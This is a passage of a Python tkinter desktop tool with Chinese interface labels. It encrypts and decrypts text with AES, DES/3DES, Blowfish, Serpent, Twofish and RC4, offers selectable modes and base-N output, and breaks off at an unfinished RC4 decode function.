txttitlefr = Frame(ff0_)
txttitlefr.pack(side=tkinter.TOP)
Label(txttitlefr, text='使用以下文本框进行加解密 [仅忽略文本前后换行符,空格不忽略],显示限制字符数:').pack(side=tkinter.LEFT,padx=10)
entlimit = Entry(txttitlefr, width=10)
entlimit.pack(side=tkinter.LEFT)
entlimit.insert(0,'10000')
ftxt = Text(ff0_,font=ft)
ftxt.pack(padx=padx,pady=pady,fill=tkinter.BOTH,expand=True)
def change_cbit_1(*content):
if content:
encd = fent1.get().strip()
blen = len(content[0].encode(encd))*8
cbit1['text'] = str(blen)+'bit'
return True
def change_cbit_2(*content):
if content:
encd = fent1.get().strip()
blen = len(content[0].encode(encd))*8
cbit2['text'] = str(blen)+'bit'
return True
change_cbit1 = root.register(change_cbit_1)
change_cbit2 = root.register(change_cbit_2)
# TODO: more ciphers (and their reference code) could be added here later
# AES alone already has five modes of operation
f23 = Frame(ff0)
f23.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f23, text=' 以下算法为 AES 加解密算法 [密码长度需注意:128bit,192bit,256bit] [iv长度需注意:128bit]。').pack(fill=tkinter.X,expand=True)
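# Sketch of how the bundled pyaes module is driven below (the mode table and feed() API are taken
# from _aes_encode/_aes_decode; the 16-byte key/iv values are just placeholders):
#   enc = pyaes.Encrypter(pyaes.AESModesOfOperation['cbc'](b'0123456789abcdef', b'0123456789abcdef'))
#   ciphertext = enc.feed(b'some plaintext')
#   dec = pyaes.Decrypter(pyaes.AESModesOfOperation['cbc'](b'0123456789abcdef', b'0123456789abcdef'))
#   plaintext = dec.feed(ciphertext)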
f24 = Frame(ff0)
f24.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f24, text='密码',width=4).pack(side=tkinter.LEFT,padx=2)
ent23 = Entry(f24,width=17,validate='key',validatecommand=(change_cbit1, '%P'))
ent23.pack(side=tkinter.LEFT)
ent23.bind('<Key>', change_cbit1)
cbit1 = Label(f24, text='0bit',width=6)
cbit1.pack(side=tkinter.LEFT,padx=6)
cbx1 = Combobox(f24,width=4,state='readonly')
cbx1['values'] = ['b16','b32','b64','b85']
cbx1.current(2)
cbx1.pack(side=tkinter.RIGHT)
Label(f24, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
def _swich_encd1(*a):
s = fent1.get().strip()
if s == 'utf-8':
fent1.delete(0,tkinter.END)
fent1.insert(0,'gbk')
elif s == 'gbk':
fent1.delete(0,tkinter.END)
fent1.insert(0,'utf-8')
else:
fent1.delete(0,tkinter.END)
fent1.insert(0,'utf-8')
change_cbit_1(ent23.get().strip())
change_cbit_2(ent24.get().strip())
fent1 = Entry(f24,width=5)
fent1.insert(0,'utf-8')
fent1.pack(side=tkinter.RIGHT)
Button(f24, text='密码/iv/数据编码格式',command=_swich_encd1).pack(side=tkinter.RIGHT)
cbx2 = Combobox(f24,width=4,state='readonly')
cbx2['values'] = ['cbc','cfb','ofb','ctr','ecb',]
cbx2.current(0)
cbx2.pack(side=tkinter.RIGHT)
Label(f24, text='模式',width=4).pack(side=tkinter.RIGHT,padx=5)
f25 = Frame(ff0)
f25.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f25, text='iv',width=4).pack(side=tkinter.LEFT,padx=2)
ent24 = Entry(f25,width=17,validate='key',validatecommand=(change_cbit2, '%P'))
ent24.pack(side=tkinter.LEFT)
cbit2 = Label(f25, text='128bit',width=6)
cbit2.pack(side=tkinter.LEFT,padx=6)
ent24.insert(0,'1234567890123456')
Label(f25, text='ecb模式:iv无效;ctr模式:iv长度不限制',).pack(side=tkinter.LEFT,padx=6)
def _aes_encode(*a):
encd = fent1.get().strip()
mode = cbx2.get().strip()
eout = cbx1.get().strip()
key = ent23.get().strip().encode(encd)
iv = ent24.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
limitnum = int(entlimit.get().strip())
ftxt.delete(0.,tkinter.END)
try:
from . import pyaes
except:
# do not have the PyPI pyaes package installed when testing this script; part of its source has issues here
import pyaes
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
Encrypter = pyaes.Encrypter
Counter = pyaes.Counter
AESModesOfOperation = pyaes.AESModesOfOperation
try:
if mode == 'ctr':
enc = Encrypter(AESModesOfOperation[mode](key, Counter(int.from_bytes(iv, 'big'))))
elif mode == 'ecb':
enc = Encrypter(AESModesOfOperation[mode](key))
else:
enc = Encrypter(AESModesOfOperation[mode](key, iv))
en = _encode(enc.feed(data)).decode(encd)
if len(en) > limitnum:
print('警告!')
print('加密数据长度({})过长(超过{}字符,超过的部分不显示)'.format(len(en),limitnum))
print('因为 tkinter 性能瓶颈,不宜在 tkinter 窗口展示,请使用算法在别的IDE内实现')
print('---------------------------------------------------')
print(en[:limitnum])
else:
print(en)
except:
print(traceback.format_exc())
def _aes_decode(*a):
encd = fent1.get().strip()
mode = cbx2.get().strip()
eout = cbx1.get().strip()
key = ent23.get().strip().encode(encd)
iv = ent24.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
ftxt.delete(0.,tkinter.END)
try:
from . import pyaes
except:
# do not have the PyPI pyaes package installed when testing this script; part of its source has issues here
import pyaes
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
Decrypter = pyaes.Decrypter
Counter = pyaes.Counter
AESModesOfOperation = pyaes.AESModesOfOperation
try:
if mode == 'ctr':
dec = Decrypter(AESModesOfOperation[mode](key, Counter(int.from_bytes(iv, 'big'))))
elif mode == 'ecb':
dec = Decrypter(AESModesOfOperation[mode](key))
else:
dec = Decrypter(AESModesOfOperation[mode](key, iv))
dc = dec.feed(_decode(data)).decode(encd)
print(dc)
except:
print(traceback.format_exc())
def _aes_code(*a):
try:
from . import pyaes
except:
import pyaes
ftxt.delete(0.,tkinter.END)
with open(pyaes.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(f25, text='[算法]',command=_aes_code,width=5).pack(side=tkinter.RIGHT)
Button(f25, text='解密',command=_aes_decode,width=5).pack(side=tkinter.RIGHT)
Button(f25, text='加密',command=_aes_encode,width=5).pack(side=tkinter.RIGHT)
# The following section adds pure-python DES/3DES encryption and decryption
def change_cbit_3(*content):
if content:
encd = fent2.get().strip()
blen = len(content[0].encode(encd))*8
cbit3['text'] = str(blen)+'bit'
return True
def change_cbit_4(*content):
if content:
encd = fent2.get().strip()
blen = len(content[0].encode(encd))*8
cbit4['text'] = str(blen)+'bit'
return True
change_cbit3 = root.register(change_cbit_3)
change_cbit4 = root.register(change_cbit_4)
f23 = Frame(ff0)
f23.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f23, text=' 以下算法为 DES/3DES 加解密算法 [密码长度:64bit(DES),128bit(3DES),192bit(3DES)] [iv长度:64bit]。').pack(fill=tkinter.X,expand=True)
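# Sketch of the bundled pydes usage below (per _des_encode/_des_decode): an 8-byte key selects
# single DES, a 16/24-byte key selects triple DES; key/iv values here are placeholders:
#   d = pydes.des(b'8bytekey', pydes.CBC, b'12345678', padmode=pydes.PAD_PKCS5)
#   ct = d.encrypt(b'secret data')
#   d.decrypt(ct)    # -> b'secret data'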
f24 = Frame(ff0)
f24.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f24, text='密码',width=4).pack(side=tkinter.LEFT,padx=2)
ent25 = Entry(f24,width=17,validate='key',validatecommand=(change_cbit3, '%P'))
ent25.pack(side=tkinter.LEFT)
ent25.bind('<Key>', change_cbit3)
cbit3 = Label(f24, text='0bit',width=6)
cbit3.pack(side=tkinter.LEFT,padx=6)
cbx3 = Combobox(f24,width=4,state='readonly')
cbx3['values'] = ['b16','b32','b64','b85']
cbx3.current(2)
cbx3.pack(side=tkinter.RIGHT)
Label(f24, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
def _swich_encd2(*a):
s = fent2.get().strip()
if s == 'utf-8':
fent2.delete(0,tkinter.END)
fent2.insert(0,'gbk')
elif s == 'gbk':
fent2.delete(0,tkinter.END)
fent2.insert(0,'utf-8')
else:
fent2.delete(0,tkinter.END)
fent2.insert(0,'utf-8')
change_cbit_3(ent25.get().strip())
change_cbit_4(ent26.get().strip())
fent2 = Entry(f24,width=5)
fent2.insert(0,'utf-8')
fent2.pack(side=tkinter.RIGHT)
Button(f24, text='密码/iv/数据编码格式',command=_swich_encd2).pack(side=tkinter.RIGHT)
cbx4 = Combobox(f24,width=4,state='readonly')
cbx4['values'] = ['cbc','ecb',]
cbx4.current(0)
cbx4.pack(side=tkinter.RIGHT)
Label(f24, text='模式',width=4).pack(side=tkinter.RIGHT,padx=5)
f25 = Frame(ff0)
f25.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f25, text='iv',width=4).pack(side=tkinter.LEFT,padx=2)
ent26 = Entry(f25,width=17,validate='key',validatecommand=(change_cbit4, '%P'))
ent26.pack(side=tkinter.LEFT)
cbit4 = Label(f25, text='64bit',width=6)
cbit4.pack(side=tkinter.LEFT,padx=6)
ent26.insert(0,'12345678')
Label(f25, text='ecb模式:iv无效;ctr模式:iv长度不限制',).pack(side=tkinter.LEFT,padx=6)
def _des_encode(*a):
encd = fent2.get().strip()
mode = cbx4.get().strip()
eout = cbx3.get().strip()
key = ent25.get().strip().encode(encd)
iv = ent26.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
limitnum = int(entlimit.get().strip())
ftxt.delete(0.,tkinter.END)
try:
from . import pydes
except:
# note copied from the pyaes section: use the bundled pydes here, not an installed package
import pydes
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
if len(key) not in [8,16,24]:
print('error. len(key) must in [64bit,128bit,192bit]. now is {}.'.format(len(key)*8))
return
try:
if mode == 'ecb': mode = pydes.ECB
elif mode == 'cbc': mode = pydes.CBC
else:
print('error mode:{}, mode must in [ecb cbc]'.format(mode))
if len(key) == 8:
d = pydes.des(key, mode, iv, padmode=pydes.PAD_PKCS5)
else:
d = pydes.triple_des(key, mode, iv, padmode=pydes.PAD_PKCS5)
en = _encode(d.encrypt(data)).decode(encd)
if len(en) > limitnum:
print('警告!')
print('加密数据长度({})过长(超过{}字符,超过的部分不显示)'.format(len(en),limitnum))
print('因为 tkinter 性能瓶颈,不宜在 tkinter 窗口展示,请使用算法在别的IDE内实现')
print('---------------------------------------------------')
print(en[:limitnum])
else:
print(en)
except:
print(traceback.format_exc())
def _des_decode(*a):
encd = fent2.get().strip()
mode = cbx4.get().strip()
eout = cbx3.get().strip()
key = ent25.get().strip().encode(encd)
iv = ent26.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
ftxt.delete(0.,tkinter.END)
try:
from . import pydes
except:
# note copied from the pyaes section: use the bundled pydes here, not an installed package
import pydes
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
if len(key) not in [8,16,24]:
print('error. len(key) must in [64bit,128bit,192bit]. now is {}.'.format(len(key)*8))
return
try:
if mode == 'ecb': mode = pydes.ECB
elif mode == 'cbc': mode = pydes.CBC
else:
print('error mode:{}, mode must in [ecb cbc]'.format(mode))
if len(key) == 8:
d = pydes.des(key, mode, iv, padmode=pydes.PAD_PKCS5)
else:
d = pydes.triple_des(key, mode, iv, padmode=pydes.PAD_PKCS5)
dc = d.decrypt(_decode(data)).decode(encd)
print(dc)
except:
print(traceback.format_exc())
def _des_code(*a):
try:
from . import pydes
except:
import pydes
ftxt.delete(0.,tkinter.END)
with open(pydes.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(f25, text='[算法]',command=_des_code,width=5).pack(side=tkinter.RIGHT)
Button(f25, text='解密',command=_des_decode,width=5).pack(side=tkinter.RIGHT)
Button(f25, text='加密',command=_des_encode,width=5).pack(side=tkinter.RIGHT)
# Blowfish section
def f100_change_cbit_1(*content):
if content:
encd = f1001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f1001_cbit1['text'] = str(blen)+'bit'
return True
def f100_change_cbit_2(*content):
if content:
encd = f1001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f1002_cbit2['text'] = str(blen)+'bit'
return True
f100_change_cbit1 = root.register(f100_change_cbit_1)
f100_change_cbit2 = root.register(f100_change_cbit_2)
f1000 = Frame(ff0)
f1000.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f1000, text=' 以下算法为 Blowfish 加解密算法 [密码长度区间:32-448bit] [iv长度需注意:64bit]。').pack(fill=tkinter.X,expand=True)
f1001 = Frame(ff0)
f1001.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f1001, text='密码',width=4).pack(side=tkinter.LEFT,padx=2)
f1001_ent1 = Entry(f1001,width=17,validate='key',validatecommand=(f100_change_cbit1, '%P'))
f1001_ent1.pack(side=tkinter.LEFT)
f1001_ent1.bind('<Key>', f100_change_cbit1)
f1001_cbit1 = Label(f1001, text='0bit',width=6)
f1001_cbit1.pack(side=tkinter.LEFT,padx=6)
f1001_mode1 = Combobox(f1001,width=4,state='readonly')
f1001_mode1['values'] = ['b16','b32','b64','b85']
f1001_mode1.current(2)
f1001_mode1.pack(side=tkinter.RIGHT)
Label(f1001, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
def _f100swich_encd1(*a):
s = f1001_fent1.get().strip()
if s == 'utf-8':
f1001_fent1.delete(0,tkinter.END)
f1001_fent1.insert(0,'gbk')
elif s == 'gbk':
f1001_fent1.delete(0,tkinter.END)
f1001_fent1.insert(0,'utf-8')
else:
f1001_fent1.delete(0,tkinter.END)
f1001_fent1.insert(0,'utf-8')
f100_change_cbit_1(f1001_ent1.get().strip())
f100_change_cbit_2(f1002_ent2.get().strip())
f1001_fent1 = Entry(f1001,width=5)
f1001_fent1.insert(0,'utf-8')
f1001_fent1.pack(side=tkinter.RIGHT)
Button(f1001, text='密码/iv/数据编码格式',command=_f100swich_encd1).pack(side=tkinter.RIGHT)
f1001_mode2 = Combobox(f1001,width=4,state='readonly')
f1001_mode2['values'] = ['ecb', 'ecb_cts', 'cbc', 'cbc_cts', 'pcbc', 'cfb', 'ofb', 'ctr']
f1001_mode2.current(0)
f1001_mode2.pack(side=tkinter.RIGHT)
Label(f1001, text='模式',width=4).pack(side=tkinter.RIGHT,padx=5)
f1002 = Frame(ff0)
f1002.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f1002, text='iv',width=4).pack(side=tkinter.LEFT,padx=2)
f1002_ent2 = Entry(f1002,width=17,validate='key',validatecommand=(f100_change_cbit2, '%P'))
f1002_ent2.pack(side=tkinter.LEFT)
f1002_cbit2 = Label(f1002, text='64bit',width=6)
f1002_cbit2.pack(side=tkinter.LEFT,padx=6)
f1002_ent2.insert(0,'12345678')
Label(f1002, text='ecb模式:iv无效;ctr模式:iv长度不限制',).pack(side=tkinter.LEFT,padx=6)
def _blowfish_encode(*a):
encd = f1001_fent1.get().strip()
mode = f1001_mode2.get().strip()
eout = f1001_mode1.get().strip()
key = f1001_ent1.get().strip().encode(encd)
iv = f1002_ent2.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
limitnum = int(entlimit.get().strip())
ftxt.delete(0.,tkinter.END)
try:
from . import pyblowfish
except:
import pyblowfish
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
en = pyblowfish.encrypt(key, data, iv, mode, enfunc=_encode).decode(encd)
if len(en) > limitnum:
print('警告!')
print('加密数据长度({})过长(超过{}字符,超过的部分不显示)'.format(len(en),limitnum))
print('因为 tkinter 性能瓶颈,不宜在 tkinter 窗口展示,请使用算法在别的IDE内实现')
print('---------------------------------------------------')
print(en[:limitnum])
else:
print(en)
except:
print(traceback.format_exc())
def _blowfish_decode(*a):
encd = f1001_fent1.get().strip()
mode = f1001_mode2.get().strip()
eout = f1001_mode1.get().strip()
key = f1001_ent1.get().strip().encode(encd)
iv = f1002_ent2.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
ftxt.delete(0.,tkinter.END)
try:
from . import pyblowfish
except:
import pyblowfish
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
dc = pyblowfish.decrypt(key, data, iv, mode, defunc=_decode).decode(encd)
print(dc)
except:
print(traceback.format_exc())
def _blowfish_code(*a):
try:
from . import pyblowfish
except:
import pyblowfish
ftxt.delete(0.,tkinter.END)
with open(pyblowfish.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(f1002, text='[算法]',command=_blowfish_code,width=5).pack(side=tkinter.RIGHT)
Button(f1002, text='解密',command=_blowfish_decode,width=5).pack(side=tkinter.RIGHT)
Button(f1002, text='加密',command=_blowfish_encode,width=5).pack(side=tkinter.RIGHT)
# Serpent section
def f200_change_cbit_1(*content):
if content:
encd = f2001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f2001_cbit1['text'] = str(blen)+'bit'
return True
def f200_change_cbit_2(*content):
if content:
encd = f2001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f2002_cbit2['text'] = str(blen)+'bit'
return True
f200_change_cbit1 = root.register(f200_change_cbit_1)
f200_change_cbit2 = root.register(f200_change_cbit_2)
f2000 = Frame(ff0)
f2000.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f2000, text=' 以下算法为 Serpent 加解密算法 [密码长度区间:32-256bit] [iv长度需注意:128bit]。').pack(fill=tkinter.X,expand=True)
f2001 = Frame(ff0)
f2001.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f2001, text='密码',width=4).pack(side=tkinter.LEFT,padx=2)
f2001_ent1 = Entry(f2001,width=17,validate='key',validatecommand=(f200_change_cbit1, '%P'))
f2001_ent1.pack(side=tkinter.LEFT)
f2001_ent1.bind('<Key>', f200_change_cbit1)
f2001_cbit1 = Label(f2001, text='0bit',width=6)
f2001_cbit1.pack(side=tkinter.LEFT,padx=6)
f2001_mode1 = Combobox(f2001,width=4,state='readonly')
f2001_mode1['values'] = ['b16','b32','b64','b85']
f2001_mode1.current(2)
f2001_mode1.pack(side=tkinter.RIGHT)
Label(f2001, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
def _f200swich_encd1(*a):
s = f2001_fent1.get().strip()
if s == 'utf-8':
f2001_fent1.delete(0,tkinter.END)
f2001_fent1.insert(0,'gbk')
elif s == 'gbk':
f2001_fent1.delete(0,tkinter.END)
f2001_fent1.insert(0,'utf-8')
else:
f2001_fent1.delete(0,tkinter.END)
f2001_fent1.insert(0,'utf-8')
f200_change_cbit_1(f2001_ent1.get().strip())
f200_change_cbit_2(f2002_ent2.get().strip())
f2001_fent1 = Entry(f2001,width=5)
f2001_fent1.insert(0,'utf-8')
f2001_fent1.pack(side=tkinter.RIGHT)
Button(f2001, text='密码/iv/数据编码格式',command=_f200swich_encd1).pack(side=tkinter.RIGHT)
f2001_mode2 = Combobox(f2001,width=4,state='readonly')
f2001_mode2['values'] = ['cbc', 'ecb',]
f2001_mode2.current(0)
f2001_mode2.pack(side=tkinter.RIGHT)
Label(f2001, text='模式',width=4).pack(side=tkinter.RIGHT,padx=5)
f2002 = Frame(ff0)
f2002.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f2002, text='iv',width=4).pack(side=tkinter.LEFT,padx=2)
f2002_ent2 = Entry(f2002,width=17,validate='key',validatecommand=(f200_change_cbit2, '%P'))
f2002_ent2.pack(side=tkinter.LEFT)
f2002_cbit2 = Label(f2002, text='128bit',width=6)
f2002_cbit2.pack(side=tkinter.LEFT,padx=6)
f2002_ent2.insert(0,'1234567890123456')
Label(f2002, text='ecb模式:iv无效;ctr模式:iv长度不限制',).pack(side=tkinter.LEFT,padx=6)
def _serpent_encode(*a):
encd = f2001_fent1.get().strip()
mode = f2001_mode2.get().strip()
eout = f2001_mode1.get().strip()
key = f2001_ent1.get().strip().encode(encd)
iv = f2002_ent2.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
limitnum = int(entlimit.get().strip())
ftxt.delete(0.,tkinter.END)
try:
from . import pyserpent
except:
import pyserpent
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
en = pyserpent.serpent_encrypt(key, data, iv=iv, mode=mode, enfunc=_encode).decode(encd)
if len(en) > limitnum:
print('警告!')
print('加密数据长度({})过长(超过{}字符,超过的部分不显示)'.format(len(en),limitnum))
print('因为 tkinter 性能瓶颈,不宜在 tkinter 窗口展示,请使用算法在别的IDE内实现')
print('---------------------------------------------------')
print(en[:limitnum])
else:
print(en)
except:
print(traceback.format_exc())
def _serpent_decode(*a):
encd = f2001_fent1.get().strip()
mode = f2001_mode2.get().strip()
eout = f2001_mode1.get().strip()
key = f2001_ent1.get().strip().encode(encd)
iv = f2002_ent2.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
ftxt.delete(0.,tkinter.END)
try:
from . import pyserpent
except:
import pyserpent
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
dc = pyserpent.serpent_decrypt(key, data, iv=iv, mode=mode, defunc=_decode).decode(encd)
print(dc)
except:
print(traceback.format_exc())
def _serpent_code(*a):
try:
from . import pyserpent
except:
import pyserpent
ftxt.delete(0.,tkinter.END)
with open(pyserpent.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(f2002, text='[算法]',command=_serpent_code,width=5).pack(side=tkinter.RIGHT)
Button(f2002, text='解密',command=_serpent_decode,width=5).pack(side=tkinter.RIGHT)
Button(f2002, text='加密',command=_serpent_encode,width=5).pack(side=tkinter.RIGHT)
# Twofish section
def f300_change_cbit_1(*content):
if content:
encd = f3001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f3001_cbit1['text'] = str(blen)+'bit'
return True
def f300_change_cbit_2(*content):
if content:
encd = f3001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f3002_cbit2['text'] = str(blen)+'bit'
return True
f300_change_cbit1 = root.register(f300_change_cbit_1)
f300_change_cbit2 = root.register(f300_change_cbit_2)
f3000 = Frame(ff0)
f3000.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f3000, text=' 以下算法为 Twofish 加解密算法 [密码长度需注意:128bit,192bit,256bit] [iv长度需注意:128bit]。').pack(fill=tkinter.X,expand=True)
f3001 = Frame(ff0)
f3001.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f3001, text='密码',width=4).pack(side=tkinter.LEFT,padx=2)
f3001_ent1 = Entry(f3001,width=17,validate='key',validatecommand=(f300_change_cbit1, '%P'))
f3001_ent1.pack(side=tkinter.LEFT)
f3001_ent1.bind('<Key>', f300_change_cbit1)
f3001_cbit1 = Label(f3001, text='0bit',width=6)
f3001_cbit1.pack(side=tkinter.LEFT,padx=6)
f3001_mode1 = Combobox(f3001,width=4,state='readonly')
f3001_mode1['values'] = ['b16','b32','b64','b85']
f3001_mode1.current(2)
f3001_mode1.pack(side=tkinter.RIGHT)
Label(f3001, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
def _f300swich_encd1(*a):
s = f3001_fent1.get().strip()
if s == 'utf-8':
f3001_fent1.delete(0,tkinter.END)
f3001_fent1.insert(0,'gbk')
elif s == 'gbk':
f3001_fent1.delete(0,tkinter.END)
f3001_fent1.insert(0,'utf-8')
else:
f3001_fent1.delete(0,tkinter.END)
f3001_fent1.insert(0,'utf-8')
f300_change_cbit_1(f3001_ent1.get().strip())
f300_change_cbit_2(f3002_ent2.get().strip())
f3001_fent1 = Entry(f3001,width=5)
f3001_fent1.insert(0,'utf-8')
f3001_fent1.pack(side=tkinter.RIGHT)
Button(f3001, text='密码/iv/数据编码格式',command=_f300swich_encd1).pack(side=tkinter.RIGHT)
f3001_mode2 = Combobox(f3001,width=4,state='readonly')
f3001_mode2['values'] = ['cbc', 'ecb',]
f3001_mode2.current(0)
f3001_mode2.pack(side=tkinter.RIGHT)
Label(f3001, text='模式',width=4).pack(side=tkinter.RIGHT,padx=5)
f3002 = Frame(ff0)
f3002.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f3002, text='iv',width=4).pack(side=tkinter.LEFT,padx=2)
f3002_ent2 = Entry(f3002,width=17,validate='key',validatecommand=(f300_change_cbit2, '%P'))
f3002_ent2.pack(side=tkinter.LEFT)
f3002_cbit2 = Label(f3002, text='128bit',width=6)
f3002_cbit2.pack(side=tkinter.LEFT,padx=6)
f3002_ent2.insert(0,'1234567890123456')
Label(f3002, text='ecb模式:iv无效;ctr模式:iv长度不限制',).pack(side=tkinter.LEFT,padx=6)
def _twofish_encode(*a):
encd = f3001_fent1.get().strip()
mode = f3001_mode2.get().strip()
eout = f3001_mode1.get().strip()
key = f3001_ent1.get().strip().encode(encd)
iv = f3002_ent2.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
limitnum = int(entlimit.get().strip())
ftxt.delete(0.,tkinter.END)
try:
from . import pytwofish
except:
import pytwofish
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
en = pytwofish.twofish_encrypt(key, data, iv=iv, mode=mode, enfunc=_encode).decode(encd)
if len(en) > limitnum:
print('警告!')
print('加密数据长度({})过长(超过{}字符,超过的部分不显示)'.format(len(en),limitnum))
print('因为 tkinter 性能瓶颈,不宜在 tkinter 窗口展示,请使用算法在别的IDE内实现')
print('---------------------------------------------------')
print(en[:limitnum])
else:
print(en)
except:
print(traceback.format_exc())
def _twofish_decode(*a):
encd = f3001_fent1.get().strip()
mode = f3001_mode2.get().strip()
eout = f3001_mode1.get().strip()
key = f3001_ent1.get().strip().encode(encd)
iv = f3002_ent2.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
ftxt.delete(0.,tkinter.END)
try:
from . import pytwofish
except:
import pytwofish
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
dc = pytwofish.twofish_decrypt(key, data, iv=iv, mode=mode, defunc=_decode).decode(encd)
print(dc)
except:
print(traceback.format_exc())
def _twofish_code(*a):
try:
from . import pytwofish
except:
import pytwofish
ftxt.delete(0.,tkinter.END)
with open(pytwofish.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(f3002, text='[算法]',command=_twofish_code,width=5).pack(side=tkinter.RIGHT)
Button(f3002, text='解密',command=_twofish_decode,width=5).pack(side=tkinter.RIGHT)
Button(f3002, text='加密',command=_twofish_encode,width=5).pack(side=tkinter.RIGHT)
f200 = Frame(ff0)
f200.pack(side=tkinter.TOP,fill=tkinter.X)
f201 = Frame(f200)
f202 = Frame(f200)
f201.pack(side=tkinter.TOP,fill=tkinter.X)
f202.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f201, text=' 以下算法为 rc4 解密算法').pack(fill=tkinter.X,expand=True)
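# Sketch of the bundled pyrc4 call used below (mode/enfunc/defunc follow _rc4_encode/_rc4_decode;
# key and data values are placeholders):
#   ct = pyrc4.rc4(b'secret data', b'key', mode="encode", enfunc=base64.b64encode, defunc=base64.b64decode)
#   pyrc4.rc4(ct, b'key', mode="decode", enfunc=base64.b64encode, defunc=base64.b64decode)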
def _rc4_encode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
encd = k201.get().strip('\n')
key = k200.get().strip('\n').encode(encd)
data = data.encode(encd)
mode = cbx201.get().strip()
try:
from . import pyrc4
except:
import pyrc4
if mode == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if mode == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if mode == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if mode == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
f = pyrc4.rc4(data, key, mode="encode", enfunc=_encode, defunc=_decode)
print(f.decode(encd))
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error encoding!!! check input data.')
def _rc4_decode(*a):
